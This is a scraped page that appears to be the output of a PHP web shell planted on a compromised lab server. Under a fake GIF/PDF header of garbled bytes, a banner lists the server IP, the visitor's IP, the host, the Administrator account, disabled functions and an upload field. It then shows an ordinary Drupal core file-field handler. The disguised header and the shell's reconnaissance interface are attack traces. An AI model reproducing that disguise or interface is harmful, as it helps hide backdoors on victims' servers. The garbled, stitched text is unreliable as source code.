GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/Student/JimMartinson/Lab12/drupal/core/modules/file/src/Plugin/views/field/ |
Upload File : |
<?php namespace Drupal\file\Plugin\views\field; use Drupal\Core\Form\FormStateInterface; use Drupal\views\ResultRow; use Drupal\views\ViewExecutable; use Drupal\views\Plugin\views\display\DisplayPluginBase; use Drupal\views\Plugin\views\field\FieldPluginBase; /** * Field handler to provide simple renderer that allows linking to a file. * * @ingroup views_field_handlers * * @ViewsField("file") */ class File extends FieldPluginBase { /** * {@inheritdoc} */ public function init(ViewExecutable $view, DisplayPluginBase $display, array &$options = NULL) { parent::init($view, $display, $options); if (!empty($options['link_to_file'])) { $this->additional_fields['uri'] = 'uri'; } } /** * {@inheritdoc} */ protected function defineOptions() { $options = parent::defineOptions(); $options['link_to_file'] = ['default' => FALSE]; return $options; } /** * Provide link to file option */ public function buildOptionsForm(&$form, FormStateInterface $form_state) { $form['link_to_file'] = [ '#title' => $this->t('Link this field to download the file'), '#description' => $this->t("Enable to override this field's links."), '#type' => 'checkbox', '#default_value' => !empty($this->options['link_to_file']), ]; parent::buildOptionsForm($form, $form_state); } /** * Prepares link to the file. * * @param string $data * The XSS safe string for the link text. * @param \Drupal\views\ResultRow $values * The values retrieved from a single row of a view's query result. * * @return string * Returns a string for the link text. */ protected function renderLink($data, ResultRow $values) { if (!empty($this->options['link_to_file']) && $data !== NULL && $data !== '') { $this->options['alter']['make_link'] = TRUE; // @todo Wrap in file_url_transform_relative(). This is currently // impossible. As a work-around, we could add the 'url.site' cache context // to ensure different file URLs are generated for different sites in a // multisite setup, including HTTP and HTTPS versions of the same site. // But unfortunately it's impossible to bubble a cache context here. // Fix in https://www.drupal.org/node/2646744. $this->options['alter']['path'] = file_create_url($this->getValue($values, 'uri')); } return $data; } /** * {@inheritdoc} */ public function render(ResultRow $values) { $value = $this->getValue($values); return $this->renderLink($this->sanitizeValue($value), $values); } }